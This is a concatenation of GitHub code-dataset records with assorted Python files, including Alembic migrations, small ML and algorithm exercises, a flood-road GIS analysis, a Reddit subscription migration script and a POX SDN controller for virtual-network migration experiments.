model.score(x_test , y_test)\nprint(accuracy)\n\n#make predictions\npredicted = model.predict(x_test)\n\n\n#output\noutput = ['malignant' , 'benign']\nfor i in range(len(predicted)):\n print(\"For the values \" , x_test[i])\n print(\"The predicted value is\" , output[predicted[i]])\n print(\"The actual value is \" , output[y_test[i]])","repo_name":"IshanPoudel/GradeCalculationUsingML","sub_path":"Support_Vector_Machines/cancer_prediction_using_knn.py","file_name":"cancer_prediction_using_knn.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18713866612","text":"\"\"\"empty message\n\nRevision ID: 40dea8107299\nRevises: 1d1cabe0f58e\nCreate Date: 2020-08-17 20:01:58.553252\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '40dea8107299'\ndown_revision = '1d1cabe0f58e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('Area',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('city', sa.String(length=120), nullable=True),\n sa.Column('state', sa.String(length=120), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_column('Venue', 'state')\n op.drop_column('Venue', 'city')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('city', sa.VARCHAR(length=120), autoincrement=False, nullable=True))\n op.add_column('Venue', sa.Column('state', sa.VARCHAR(length=120), autoincrement=False, nullable=True))\n op.drop_table('Area')\n # ### end Alembic commands ###\n","repo_name":"ZiadEzat/project-fyyur","sub_path":"migrations/versions/40dea8107299_.py","file_name":"40dea8107299_.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37703187307","text":"\"\"\"Simple example of two SST components playing pingpong with messages.\"\"\"\n\nfrom ahp_graph.DeviceGraph import *\nfrom ahp_graph.SSTGraph import *\nfrom architecture import architecture\n\n\nif __name__ == \"__main__\":\n \"\"\"\n If we are running as a script (either via Python or from SST), then\n proceed. Check if we are running with SST or from Python.\n \"\"\"\n import argparse\n try:\n import sst # type: ignore[import]\n SST = True\n except ImportError:\n SST = False\n\n parser = argparse.ArgumentParser(description='PingPong')\n parser.add_argument('--num', type=int, default=3,\n help='how many pingpongs to include')\n parser.add_argument('--rank', type=int, default=0,\n help='which rank to generate the JSON file for')\n parser.add_argument('--repeats', type=int, default=5,\n help='how many message volleys to run')\n parser.add_argument('--partitioner', type=str, default='sst',\n help='which partitioner to use: ahp_graph, sst')\n args = parser.parse_args()\n\n # Construct a DeviceGraph with the specified architecture\n graph = architecture(args.repeats, args.num)\n sstgraph = SSTGraph(graph)\n\n if SST:\n # If running within SST, generate the SST graph\n # There are multiple ways to run, below are two examples\n\n # SST partitioner\n # This will work in serial or running SST with MPI in parallel\n if args.partitioner.lower() == 'sst':\n sstgraph.build()\n\n # MPI mode with ahp_graph graph partitioning. Specifying nranks tells\n # ahp_graph that it is doing the partitioning, not SST\n # For this to work you need to pass --parallel-load=SINGLE to sst\n elif args.partitioner.lower() == 'ahp_graph':\n sstgraph.build(args.num)\n\n else:\n # SST partitioner\n # This will generate a flat dot graph and a single JSON file\n if args.partitioner.lower() == 'sst':\n graph.flatten()\n graph.write_dot('pingpongFlat', draw=True, ports=True, hierarchy=False)\n sstgraph.write_json('pingpongFlat')\n\n # If ahp_graph is partitioning, we generate a hierarchical DOT graph\n # and a JSON file for the rank that is specified from the command line\n elif args.partitioner.lower() == 'ahp_graph':\n if args.rank == 0:\n graph.write_dot('pingpong', draw=True, ports=True)\n sstgraph.write_json('pingpong', nranks=args.num, rank=args.rank)\n","repo_name":"lpsmodsimteam/ahp_graph","sub_path":"examples/pingpong/sst/pingpong.py","file_name":"pingpong.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"3677974420","text":"\"\"\"empty message\n\nRevision ID: ceb7e1bed7c2\nRevises: 7098b8533cbf\nCreate Date: 2021-03-13 20:56:32.768354\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ceb7e1bed7c2'\ndown_revision = '7098b8533cbf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user_seasons', sa.Column('episode', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user_seasons', 'episode')\n # ### end Alembic commands ###\n","repo_name":"kuna728/raspigo","sub_path":"migrations/versions/ceb7e1bed7c2_.py","file_name":"ceb7e1bed7c2_.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10323135291","text":"import pandas as pd\nimport numpy as np\nnp.seterr(divide = 'ignore') \n\ndef rsj_funct(data, consulta):\n #numDocs = data.count(axis=1)[0]\n numDocs = 1000\n a = (consulta*data)\n numDocsWord = a[a>1]\n numDocsWord = numDocsWord.count()\n numDocsWord = numDocsWord[numDocsWord != 0]\n result = np.log((numDocs - numDocsWord + 0.5) / (numDocsWord + 0.5))\n return result\n\ndata = pd.read_csv('datos.txt')\ndata = data.set_index('documento')\nconsulta = [0,0,1,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0]\n\nrsj = rsj_funct(data, consulta)\n\nlongDoc = data.sum(axis=1)\navgLong = np.mean(longDoc)\nnormLong = longDoc/avgLong\n\nnumerador = data.mul(rsj, axis =1)\ndenominador = data.add(normLong, axis = 0)\n\nresult = numerador.div(denominador, axis = 0)\nprint(result.sum(axis = 1).sort_values(ascending=False))","repo_name":"Jarostegui/Information-retrieval-assigments","sub_path":"P3/bm25.py","file_name":"bm25.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14219855843","text":"'''\n设置上下左右四条边界 动态调整四条边界\n参考 https://leetcode-cn.com/problems/shun-shi-zhen-da-yin-ju-zhen-lcof/solution/mian-shi-ti-29-shun-shi-zhen-da-yin-ju-zhen-she-di/\n'''\nclass Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n if not matrix:\n return matrix\n left,top,right,bottom = 0,0,len(matrix[0])-1,len(matrix)-1\n result = []\n while True:\n #从左到右\n for i in range(left,right+1):\n result.append(matrix[top][i])\n top +=1\n #从上到下\n if top>bottom:break\n for i in range(top,bottom+1):\n result.append(matrix[i][right])\n right -= 1\n #从右到左\n if left>right:break\n for i in range(right,left-1,-1):\n result.append(matrix[bottom][i])\n bottom-=1\n if top>bottom:break\n #从下到上\n for i in range(bottom,top-1,-1):\n result.append(matrix[i][left])\n left+=1\n if left>right:break\n return result","repo_name":"KyleC14/SwordToOfferPractice","sub_path":"code/Question29/Solution2.py","file_name":"Solution2.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2749733565","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 20 19:57:09 2019\n\n@author: dbosami2\n\"\"\"\n\nimport pandas as pd\n\ndata=pd.read_csv('airquality.csv')\nozone_mean= data.Ozone.mean()\n\n#replace missing valueswith mean\n\ndata['Ozone']= data.Ozone.fillna(ozone_mean)\n\nprint(data)","repo_name":"dashanbosamia/data-science","sub_path":"pg5.py","file_name":"pg5.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7415153832","text":"\"\"\"\nThis file will out put a CSV file for each of the flood levels, the CSV file will contain data for all the roads which\nare flooded. In the Python console the total length of road flooded for each flood level as well as a count of the\ndifferent class of roads flooded will be output.\n\n\"\"\"\n\nimport os.path\nimport geopandas as gpd\nimport pandas as pd\n\n# Load the datasets\nloughs = gpd.read_file(os.path.abspath('data_files/major_loughs.shp'))\nroads = gpd.read_file(os.path.abspath('data_files/Fermanagh roads.shp'))\nFloodOne = gpd.read_file(os.path.abspath('data_files/FloodOne.shp'))\nFloodTwo = gpd.read_file(os.path.abspath('data_files/FloodTwo.shp'))\nFloodThree = gpd.read_file(os.path.abspath('data_files/FloodThree.shp'))\nFloodFour = gpd.read_file(os.path.abspath('data_files/FloodFour.shp'))\nFloodFive = gpd.read_file(os.path.abspath('data_files/FloodFive.shp'))\n\n# Intersect operation to find roads already crossing the lough polygon, these are bridges.\nbridges = gpd.overlay(roads, loughs, how='intersection')\n\n# Intersect operation to find the roads intersected by the different flood levels\nFloodOneRoads = gpd.overlay(roads, FloodOne, how='intersection')\nFloodTwoRoads = gpd.overlay(roads, FloodTwo, how='intersection')\nFloodThreeRoads = gpd.overlay(roads, FloodThree, how='intersection')\nFloodFourRoads = gpd.overlay(roads, FloodFour, how='intersection')\nFloodFiveRoads = gpd.overlay(roads, FloodFive, how='intersection')\n\n# Rename the primary key column in bridges dataset\nbridges = bridges.rename(columns={'OBJECTID_1': 'Key'})\n\n# Spatial Difference Operation\nspatial_joinOne = gpd.sjoin(FloodOneRoads, bridges, how='left', predicate='intersects')\nFloodOneFinal = spatial_joinOne[spatial_joinOne.index_right.isna()]\nFloodOneFinal.to_csv('outputs/FloodOne.csv')\n\nspatial_joinTwo = gpd.sjoin(FloodTwoRoads, bridges, how='left', predicate='intersects')\nFloodTwoFinal = spatial_joinTwo[spatial_joinTwo.index_right.isna()]\nFloodTwoFinal.to_csv('outputs/FloodTwo.csv')\n\nspatial_joinThree = gpd.sjoin(FloodThreeRoads, bridges, how='left', predicate='intersects')\nFloodThreeFinal = spatial_joinThree[spatial_joinThree.index_right.isna()]\nFloodThreeFinal.to_csv('outputs/FloodThree.csv')\n\nspatial_joinFour = gpd.sjoin(FloodFourRoads, bridges, how='left', predicate='intersects')\nFloodFourFinal = spatial_joinFour[spatial_joinFour.index_right.isna()]\nFloodFourFinal.to_csv('outputs/FloodFour.csv')\n\nspatial_joinFive = gpd.sjoin(FloodFiveRoads, bridges, how='left', predicate='intersects')\nFloodFiveFinal = spatial_joinFive[spatial_joinFive.index_right.isna()]\nFloodFiveFinal.to_csv('outputs/FloodFive.csv')\n\nFloodInputs = ['outputs/FloodOne.csv', 'outputs/FloodTwo.csv', 'outputs/FloodThree.csv',\n 'outputs/FloodFour.csv', 'outputs/FloodFive.csv']\nfor FloodInput in FloodInputs:\n # Read the CSV file into a DataFrame\n data = pd.read_csv(FloodInput)\n\n # Find the empty columns\n empty_columns = data.columns[data.isnull().all()]\n\n # Find the populated columns\n populated_columns = data.columns[data.notnull().any()]\n\n # Filter the DataFrame to keep only the populated columns\n data = data[populated_columns]\n\n # Define the output filename\n output_filename = FloodInput.replace('.csv', 'Final.csv')\n\n # Save the modified DataFrame to a new CSV file\n data.to_csv(output_filename, index=False)\n\n# Select the length column from each flood csv file\nLengthOne = FloodOneFinal['Length_left']\nLengthTwo = FloodTwoFinal['Length_left']\nLengthThree = FloodThreeFinal['Length_left']\nLengthFour = FloodFourFinal['Length_left']\nLengthFive = FloodFiveFinal['Length_left']\n\n# Select the class column from each flood csv file\nCountOne = FloodOneFinal['CLASS_left']\nCountTwo = FloodTwoFinal['CLASS_left']\nCountThree = FloodThreeFinal['CLASS_left']\nCountFour = FloodFourFinal['CLASS_left']\nCountFive = FloodFiveFinal['CLASS_left']\n\n# Print the total length of roads flooded as well as a count of the types of roads affected by the floods\nFloodOneLength = LengthOne.sum()/1000\nprint('Total length of roads flooded by the lough rising by 1m is {} kilometers'.format(FloodOneLength))\nFloodOneCount = CountOne.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodOneCount)\nFloodTwoLength = LengthTwo.sum()/1000\nprint('Total length of roads flooded by the lough rising by 2m is {} kilometers'.format(FloodTwoLength))\nFloodTwoCount = CountTwo.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodTwoCount)\nFloodThreeLength = LengthThree.sum()/1000\nprint('Total length of roads flooded by the lough rising by 3m is {} kilometers'.format(FloodThreeLength))\nFloodThreeCount = CountThree.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodThreeCount)\nFloodFourLength = LengthFour.sum()/1000\nprint('Total length of roads flooded by the lough rising by 4m is {} kilometers'.format(FloodFourLength))\nFloodFourCount = CountFour.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodFourCount)\nFloodFiveLength = LengthFive.sum()/1000\nprint('Total length of roads flooded by the lough rising by 5m is {} kilometers'.format(FloodFiveLength))\nFloodFiveCount = CountFive.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodFiveCount)","repo_name":"mulhollandc31/egm722project","sub_path":"Flood_Stats.py","file_name":"Flood_Stats.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8638232336","text":"n = int(input())\narr = []\nfor _ in range(n):\n arr.append(list(map(int, input().split())))\n\nnm = 0\nnp = 0\nnz = 0\n\n\ndef cut(x, y, n):\n global nm, np, nz\n\n num_check = arr[x][y]\n for i in range(x, x+n):\n for j in range(y, y+n):\n if(arr[i][j] != num_check):\n for k in range(3):\n for l in range(3):\n cut(x+k*n//3, y+l*n//3, n//3)\n return\n\n if num_check == -1:\n nm += 1\n elif num_check == 0:\n nz += 1\n elif num_check == 1:\n np += 1\n\n\ncut(0, 0, n)\nprint(nm)\nprint(nz)\nprint(np)\n","repo_name":"yangwooseong/algorithm","sub_path":"boj/1780.py","file_name":"1780.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22777235484","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"myBox-qutaishat\",\n version=\"0.0.1\",\n author=\"Samah qutaishat\",\n author_email=\"samah-samir-a--alkayed.ktaishat@edu.dsti.institute\",\n description=\"myBox offers utility classes and functions for dealing with the DSTI combined SQL & Python project\",\n url=\"\",\n packages=setuptools.find_packages(),\n python_requires='>=3.6',\n)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"samahalkayedktaishat/SQL-and-Software-Engineering-Project-","sub_path":"Python_SQL_Project_DS_SAMAH/myBox/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72625306172","text":"# Adapted from leemi's migratereddit.py on GitHub Gist (https://gist.github.com/leemi/e36e8c056aff7990baad28de6e7458d1)\n# Old version was in Pythohn 2 and was using an out-dated version of praw\n\nimport praw\nfrom prawcore.exceptions import Forbidden\nimport settings \t# Reddit account info in settings.py\nfrom tqdm import tqdm\n\n# Load account info\nold_account, new_account = settings.reddit_init()\n\n# Remove default subreddits\nfor sub in tqdm(new_account.user.subreddits(limit=None)):\n\tsub.unsubscribe()\n\nnum_subs_old_account = 0\n\n# Copy Subreddits\nfor sub in tqdm(old_account.user.subreddits(limit=None)):\n\tnum_subs_old_account = num_subs_old_account + 1\n\ttry:\n\t\tnew_account.subreddit(sub.display_name).subscribe()\n\texcept Forbidden: \n\t\t# Usually occurs for user accounts that the account is following (u_username)\n\t\tprint(\"\\nManually subscribe - automatic subscription failed: \" + sub.display_name)\n\n# Sanity check\nnum_subs_new_account = 0\nfor sub in new_account.user.subreddits(limit=None):\n\tnum_subs_new_account = num_subs_new_account + 1\nprint(\"Number of subscribed subreddits for old account: \" + str(num_subs_old_account))\nprint(\"Number of subscribed subreddits for new account: \" + str(num_subs_new_account))","repo_name":"erin-bristow/reddit-account-migration","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25007323358","text":"people = int(input())\nlifts = [int(i) for i in input().split()]\navailable_seats = len(lifts) * 4 - sum(lifts)\n\nis_no_people_left = False\npeople_that_will_need_to_wait = 0\nfull_fit = True if people == available_seats else False\nif people >= available_seats:\n people_that_will_need_to_wait = people - available_seats\n lifts = [4 for i in range(len(lifts))]\nelse:\n for i, free_seats_in_lift in enumerate(lifts):\n for j in range(4 - free_seats_in_lift):\n people -= 1\n lifts[i] += 1\n if people == 0:\n is_no_people_left = True\n # all people have seats in the lift\n break\n if is_no_people_left:\n break\n\nif not full_fit:\n if is_no_people_left:\n print(\"The lift has empty spots!\")\n else:\n print(f\"There isn't enough space! {people_that_will_need_to_wait} people in a queue!\")\n\nprint(\" \".join([str(i) for i in lifts]))\n","repo_name":"Yordanofff/SoftUniPython","sub_path":"Fundamentals/Fundamentals - Exams/01. Programming Fundamentals Mid Exam Retake/02. The Lift.py","file_name":"02. The Lift.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33112175066","text":"import uuid\r\nimport math\r\nimport string\r\n\r\nimport pygame\r\nfrom pygame.sprite import Sprite\r\nimport actors\r\nfrom actors import *\r\nimport imageutils\r\n\r\nfrom vector2 import Vector2\r\n\r\nclass Shape(Sprite):\r\n loaded_images = {}\r\n\r\n def __init__(self, texture_path, size, rotation, shape_type, color):\r\n Sprite.__init__(self) #call Sprite intializer\r\n self.id = uuid.uuid1()\r\n \r\n self.rotation = rotation\r\n self.size = size\r\n self.texture_path = texture_path\r\n self.color = color\r\n \r\n self.image = pygame.transform.scale(self.getfile(self.texture_path), (self.size, self.size))\r\n self.rect = self.image.get_rect();\r\n \r\n self.original = self.image;\r\n \r\n self.bounding = self.rect.inflate(-self.rect.width/2.25, -self.rect.height/2.25) \r\n self.pointvalue = 0\r\n if shape_type == actors.Octagon.shape_type:\r\n self.pointvalue = 800\r\n elif shape_type == actors.Hexagon.shape_type:\r\n self.pointvalue = 800\r\n elif shape_type == actors.Pentagon.shape_type:\r\n self.pointvalue = 500\r\n elif shape_type == actors.Square.shape_type:\r\n self.pointvalue = 400\r\n elif shape_type == actors.Tri.shape_type:\r\n self.pointvalue = 300\r\n \r\n self.directionx = 1\r\n self.directiony = 0\r\n \r\n self.last_location = None\r\n self.last_vector = None\r\n self.parent = None\r\n \r\n self.randirx = 0\r\n self.randiry = 0\r\n \r\n def update(self, delta):\r\n if self.last_location:\r\n self.last_vector = Vector2.from_points(self.last_location, (self.rect.x, self.rect.y))\r\n \r\n self.rect.move_ip((self.randirx, self.randiry))\r\n \r\n center = self.rect.center\r\n self.image = pygame.transform.rotate(self.original, self.rotation)\r\n self.rect = self.image.get_rect(center=center)\r\n self.bounding = self.rect.inflate(-self.rect.width/2.25, -self.rect.height/2.25) \r\n \r\n self.last_location = (self.rect.x, self.rect.y)\r\n \r\n \r\n def getfile(self, texture_path):\r\n if texture_path in Shape.loaded_images:\r\n return Shape.loaded_images[texture_path]\r\n else:\r\n image, rect = imageutils.load_image(texture_path, -1)\r\n rect = image.get_rect(center=rect.center)\r\n rect.move_ip((-image.get_width()/2, -image.get_height()/2))\r\n Shape.loaded_images[texture_path] = image\r\n return image\r\n \r\n @classmethod\r\n def build_texture_path(self, color, shape_type):\r\n return \"%s_%s.png\" % (color, shape_type)\r\n \r\n def rotate_direction(self, angle_degrees):\r\n radians = math.radians(angle_degrees)\r\n cos = math.cos(radians)\r\n sin = math.sin(radians)\r\n x = cos\r\n y = sin\r\n self.directionx = x\r\n self.directiony = y","repo_name":"ivanvenosdel/colored-shapes","sub_path":"actors/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13257102145","text":"#Programa de cálculo de média utilizando 3 notas\r\n\r\nnota1 = float(input('Sua Primeira Nota: '))\r\nnota2 = float(input('Sua Segunda Nota: '))\r\nnota3 = float(input('Sua Terceira Nota: '))\r\nmedia = (nota1 + nota2 + nota3) / 3\r\nprint('Com as notas {:.1f}, {:.1f} e {:.1f}, a média do aluno é {:.1f}'.format(nota1, nota2, nota3, media))\r\nif 7 > media >=5:\r\n print('O Aluno está em RECUPERAÇÃO!')\r\nelif media < 5:\r\n print('O Aluno está REPROVADO!')\r\nelif media >=7:\r\n print('O Aluno está APROVADO!')","repo_name":"swapnes/problema2-python","sub_path":"resolução problema.py","file_name":"resolução problema.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15521829350","text":"from pox.core import core\nfrom pox.lib.util import dpidToStr\nimport pox.openflow.libopenflow_01 as of\nimport json\nimport os\nimport time\n\nimport threading\nimport remote_cmd\n\n# include as part of the betta branch\nfrom pox.openflow.of_json import *\n\novs2_tcpdump_duration = \"60s\"\novs1_dpid = 1\novs2_dpid = 2\novs3_dpid = 3\novs4_dpid = 4\novs5_dpid = 5\novs6_dpid = 6\ng1_dpid = 7\ng2_dpid = 8\ng3_dpid = 9\nt4_dpid = 16\nhost1_IP = '172.17.5.15'\nhost2_IP = '172.17.5.17'\nhost3_IP = '172.17.5.18'\ng1_IP = '128.163.232.65'\ng2_IP = '128.163.232.67'\ng3_IP = '128.163.232.68'\nhost1 = '10.10.1.1'\nhost2 = '10.10.1.4'\nhost3 = '10.10.1.6'\novs1_IP = '128.163.232.77'\novs2_IP = '128.163.232.82'\novs3_IP = '128.163.232.84'\novs4_IP = '128.163.232.95'\novs5_IP = '128.163.232.104'\novs6_IP = '128.163.232.105'\nt4_IP = '128.163.232.106'\n\nflow_table = {}\n\nlog = core.getLogger()\n\n\n# migrate virtual network\ndef _migrate_vn ():\n threading.Timer(10,_initial_config).start()\n \n client_cmd = 'iperf -c 10.10.1.6 -u -t 100'\n threading.Timer(30, _iperf, args=(host2_IP, client_cmd, )).start()\n\n # start migration after 1 minute\n log.info(\"start timer: start migration after 1 minutes\")\n threading.Timer(60, start_migration).start()\n\ndef _initial_config():\n log.info(\"initial configuration starts\")\n _initialize_sw()\n _config_gateway(1)\n \n \ndef _initialize_sw():\n log.info('install rules on vn-2 to direct all traffic to tunnel switch')\n for connection in core.openflow.connections.values():\n if connection.dpid == ovs4_dpid:\n _install_path_by_port(connection, 2, 1)\n _install_path_by_port(connection, 3, 1)\n _install_path_by_port(connection, 4, 1)\n elif connection.dpid == ovs5_dpid:\n _install_path_by_port(connection, 2, 1)\n _install_path_by_port(connection, 3, 1)\n elif connection.dpid == ovs6_dpid:\n _install_path_by_port(connection, 1, 2)\n _install_path_by_port(connection, 3, 2)\n elif connection.dpid == t4_dpid:\n _install_path_by_port(connection, 4, 2)\n _install_path_by_port(connection, 2, 4)\n _install_path_by_port(connection, 1, 6)\n _install_path_by_port(connection, 6, 1)\n _install_path_by_port(connection, 5, 3)\n _install_path_by_port(connection, 3, 5)\n \ndef _install_path_by_port(connection, in_port, out_port):\n msg1 = of.ofp_flow_mod()\n msg1.match.in_port = in_port\n action = of.ofp_action_output(port = out_port)\n msg1.actions.append(action)\n connection.send(msg1)\n\n\ndef _config_gateway(vn_id):\n log.info('install initial rules on gateways')\n in_port = 0\n out_port = 0\n drop_port = 0\n for connection in core.openflow._connections.values():\n\n if vn_id == 1:\n if connection.dpid == g1_dpid:\n in_port = 1\n out_port = 2\n drop_port = 3\n elif connection.dpid == g2_dpid:\n in_port = 1\n out_port = 2\n drop_port = 3\n elif connection.dpid == g3_dpid:\n in_port = 1\n out_port = 2\n drop_port = 3\n else:\n continue\n elif vn_id == 2:\n if connection.dpid == g1_dpid:\n in_port = 3\n out_port = 1\n drop_port = 2\n elif connection.dpid == g2_dpid:\n in_port = 1\n out_port = 3\n drop_port = 2\n elif connection.dpid == g3_dpid:\n in_port = 1\n out_port = 3\n drop_port = 2\n else:\n continue\n \n _gw_to_vn(connection, in_port, out_port, drop_port)\n\n\ndef _gw_to_vn(connection, in_port, out_port, drop_port):\n _delete_flow_tables(connection)\n\n msg1 = of.ofp_flow_mod()\n msg1.match.in_port = in_port\n action = of.ofp_action_output(port = out_port)\n msg1.actions.append(action)\n connection.send(msg1)\n\n msg2 = of.ofp_flow_mod()\n msg2.match.in_port = out_port\n action = of.ofp_action_output(port = in_port)\n msg2.actions.append(action)\n connection.send(msg2)\n\n msg3 = of.ofp_flow_mod()\n msg3.match.in_port = drop_port\n connection.send(msg3)\n\ndef _iperf(IP, cmd):\n t = threading.Thread(target=remote_cmd.ssh_run_cmd, args=(IP, cmd, ))\n _config_gateway(1)\n time.sleep(5)\n t.start()\n\n# start migration: copy the rules from old switches to new switches\ndef start_migration():\n log.info(\"Start migration...\")\n global start_time\n start_time = time.time()\n\n log.info('move ovs1')\n\n log.info('bring down the interfaces in ovs1')\n remote_cmd.ssh_run_cmd(ovs1_IP, 'sudo ifconfig eth2 down;sudo ifconfig eth3 down')\n\n log.info('request flow tables in ovs-1')\n for connection in core.openflow._connections.values():\n if connection.dpid == ovs1_dpid:\n _request_flow_info(connection)\n\n\ndef _request_flow_info(connection):\n connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))\n log.debug(\"Sent %i flow/port stats request(s)\", len(core.openflow._connections))\n\n\n# handler to display flow statistics received in JSON format\n# structure of event.stats is defined by ofp_flow_stats()\ndef _handle_flowstats_received (event):\n stats = flow_stats_to_list(event.stats)\n log.debug(\"FlowStatsReceived from %s: %s\", \n dpidToStr(event.connection.dpid), stats)\n\n #store flow tables in local\n flow_table[event.connection.dpid] = stats\n\n #insert the flow enries into the new switches\n _insert_flow_entries(event)\n\n _set_tunnel_rule(event)\n\n # send barrier message to ensure all flows has been installed \n event.connection.send(of.ofp_barrier_request(xid=0x80000000))\n event.connection.addListenerByName(\"BarrierIn\", _handle_flow_ready)\n\ndef _set_tunnel_rule(event):\n if event.connection.dpid == ovs1_dpid:\n log.info('install rules on ovs-1 to direct traffic from/to tunnel')\n _delete_flow_tables(event.connection)\n _install_path_by_port(event.connection, 1, 4)\n _install_path_by_port(event.connection, 4, 1)\n elif event.connection.dpid == ovs2_dpid:\n log.info('install rules on ovs-2 to direct traffic from/to tunnel')\n _delete_flow_tables(event.connection)\n _install_path_by_port(event.connection, 1, 3)\n _install_path_by_port(event.connection, 3, 1)\n\n log.info('bring back the original flow tables on ovs-4')\n _bring_ovs_back(ovs1_dpid, flow_table[ovs1_dpid])\n elif event.connection.dpid == ovs3_dpid:\n log.info('bring back the original flow tables on ovs-5')\n _bring_ovs_back(ovs2_dpid, flow_table[ovs2_dpid])\n\n\n\n# insert rules to new switch\ndef _insert_flow_entries(event):\n stats = flow_stats_to_list(event.stats)\n port_dict = {}\n insert_sw_id = 0\n if event.connection.dpid == ovs1_dpid:\n port_dict = {2:2,3:3,4:1}\n insert_sw_id = ovs4_dpid\n elif event.connection.dpid == ovs2_dpid:\n port_dict = {2:2,3:1}\n insert_sw_id = ovs5_dpid\n elif event.connection.dpid == ovs3_dpid:\n port_dict = {1:3,3:1}\n insert_sw_id = ovs6_dpid\n \n _insert_flow_into_switch(stats, insert_sw_id, port_dict)\n\ndef _insert_flow_into_switch(flows, switch_dpid, port_dict):\n for connection in core.openflow._connections.values():\n if connection.dpid == switch_dpid:\n log.info(\"delete existing flow tables on switch %s\", connection.dpid)\n _delete_flow_tables(connection)\n\n log.info(\"install rule on switch %s\", connection.dpid)\n for flow in flows:\n #log.info(\"flow: %s\", flow)\n msg = _flow_stats_to_flow_mod(flow, port_dict)\n #log.info(\"msg: %s\", msg)\n connection.send(msg)\n\n \ndef _delete_flow_tables(connection):\n clear_msg = of.ofp_flow_mod(command = of.OFPFC_DELETE)\n connection.send(clear_msg)\n\n# insert rules to new switch \ndef _bring_ovs_back(sw_dpid, stats):\n port_dict = {}\n insert_sw_id = 0\n if sw_dpid == ovs1_dpid:\n port_dict = {2:2,3:3,4:4}\n insert_sw_id = ovs4_dpid\n elif sw_dpid == ovs2_dpid:\n port_dict = {2:2,3:3}\n insert_sw_id = ovs5_dpid\n elif sw_dpid == ovs3_dpid:\n port_dict = {1:3,3:1}\n insert_sw_id = ovs6_dpid\n\n _insert_flow_into_switch(stats, insert_sw_id, port_dict)\n\n\n\n# handler to bring down the interfaces in new VNs after all flows are installed\ndef _handle_flow_ready(event):\n if event.ofp.xid != 0x80000000:\n return\n log.debug(\"barrier msg received from %s: \", event.connection.dpid)\n \n if event.connection.dpid == ovs1_dpid:\n log.info('bring up tunnel interfaces in ovs-1 and ovs-4')\n remote_cmd.ssh_run_cmd(ovs1_IP, 'sudo ifconfig eth1 up')\n remote_cmd.ssh_run_cmd(ovs4_IP, 'sudo ifconfig eth1 up')\n\n log.info('redirect at gateway 1 and 2 to vn2')\n for connection in core.openflow._connections.values():\n if connection.dpid == g1_dpid:\n _gw_to_vn(connection, 1, 3, 2)\n elif connection.dpid == g2_dpid:\n _gw_to_vn(connection, 1, 3, 2)\n\n\n log.info('movs ovs-2')\n log.debug('bring down interface in ovs-2')\n remote_cmd.ssh_run_cmd(ovs2_IP,'sudo ifconfig eth2 down')\n\n log.info('request flow tables in ovs2')\n for connection in core.openflow._connections.values():\n if connection.dpid == ovs2_dpid:\n _request_flow_info(connection)\n\n elif event.connection.dpid == ovs2_dpid:\n log.info('bring up the interfaces in ovs-2 and ovs-5')\n 